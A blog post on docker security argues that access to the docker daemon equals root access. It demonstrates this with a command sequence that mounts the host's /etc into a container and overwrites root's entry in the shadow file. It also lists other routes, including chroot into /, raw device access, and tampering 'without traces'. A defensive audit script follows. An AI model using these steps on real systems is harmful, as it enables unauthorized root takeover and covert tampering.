====== 2016-09-20 - root via docker ======

{{ :blog:2016:09:20:docker_logo.png?400|docker's logo}}

there are a lot of discussions regarding docker and its security features. there are two main aspects here:
  - can an application, started as non-root inside a container, escape from it?
  - can we gain root access by having access to docker?

in this post i'd like to quickly answer the 2nd question. just try this one out:

  # on the host: start a temporary container with the host's /etc/ mounted at /mnt
  docker run -it --rm -v /etc/:/mnt debian:stable
  # inside the container (as root): replace root's entry in the host's shadow file
  sed -i 's#^root:.*#root:YOUR_PROPERLY_ENCODED_PASSWORD_GOES_HERE:0:0:99999:7:::#' /mnt/shadow
  exit
  # back on the host
  su # type in your new password

and voila -- you're root now.

how does it work? it's simple -- we're mapping the content of /etc/ from the root filesystem (the docker daemon can access it) as /mnt inside our (temporary) container. inside the container, with root privileges, we edit the //shadow// file to set our own password.

is it the only way to go? definitely NO! some more examples follow:
  * map the whole / to /mnt and do //chroot// into there -- root there is!
  * export a device with a filesystem to a container (e.g. //--device=/dev/sda//) and mount/hex-edit it there -- and root there is!
  * map any directory you want to /mnt and just steal/change what you need w/o leaving additional traces.

...and probably many more like these. i think you get the point.

**long story short -- giving any user access to the docker daemon means effectively giving her root access.**
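
since docker access equals root access, it's worth auditing who actually has it. the script below is an added example, not part of the original post: it lists the accounts that reach the daemon through group membership. it assumes the default linux packaging, where the daemon socket is owned by the ''docker'' group; the function name ''docker_equiv_root'' and the sample group/passwd data are constructed for illustration.

```shell
#!/bin/sh
# List accounts that are effectively root because they belong to the group
# that owns the docker socket (assumed to be "docker", the packaging default).
# Usage: docker_equiv_root GROUP_FILE PASSWD_FILE [GROUP_NAME]
docker_equiv_root() {
    group_file=$1 passwd_file=$2 grp=${3:-docker}
    # group file format: name:password:GID:member,member,...
    gid=$(awk -F: -v g="$grp" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0   # no such group: nothing to report
    {
        # supplementary members listed in the group entry
        awk -F: -v g="$grp" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        # accounts whose PRIMARY group (passwd field 4) is the docker GID;
        # these never appear in the member list above and are easy to miss
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
}

# constructed sample data, not taken from a real host
sample=$(mktemp -d)
trap 'rm -rf "$sample"' EXIT
cat > "$sample/group" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:998:bob,carol
EOF
cat > "$sample/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
carol:x:1002:1002::/home/carol:/bin/bash
ci:x:1003:998::/home/ci:/bin/sh
EOF

echo "accounts with root-equivalent docker access:"
docker_equiv_root "$sample/group" "$sample/passwd"
```

on a real host, point it at /etc/group and /etc/passwd and treat every name it prints the same way you would treat an entry in sudoers. accounts coming from a directory service (LDAP and the like) are not in those files and need a separate check.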